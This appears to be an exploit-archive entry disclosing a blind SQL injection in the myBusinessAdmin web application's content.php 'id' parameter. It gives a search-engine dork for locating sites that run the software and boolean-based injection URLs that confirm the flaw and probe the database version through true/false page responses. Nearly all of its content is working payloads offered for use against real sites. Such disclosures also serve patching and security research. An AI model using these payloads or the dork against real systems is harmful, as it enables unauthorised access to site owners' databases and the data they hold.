id: 10758
date: 02/03/2010
title: myBusinessAdmin (content.php) Blind Sql Injection Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

===============================================================
myBusinessAdmin (content.php) Blind Sql Injection Vulnerability
===============================================================

.:. Script         : myBusinessAdmin
.:. Download Script: http://www.redcow.ca/products/mybusinessadmin/
.:. Bug Type       : Blind Sql Injection
.:. Dork           : "Powered by myBusinessAdmin and Red Cow Technologies, Inc."
 
####################################################################
 
===[ Exploit ]===
 
www.site.com/content.php?id=[Blind SQL INJECTION]
 
 
www.site.com/content.php?id=NULL+and+1=1       >>> True
www.site.com/content.php?id=NULL+and+1=2       >>> False
 
 
www.site.com/content.php?id=NULL+and+substring(@@version,1,1)=5  >>> True
www.site.com/content.php?id=NULL+and+substring(@@version,1,1)=4  >>> False
 
 
 
####################################################################



#  0day.today [2023-03-25]  #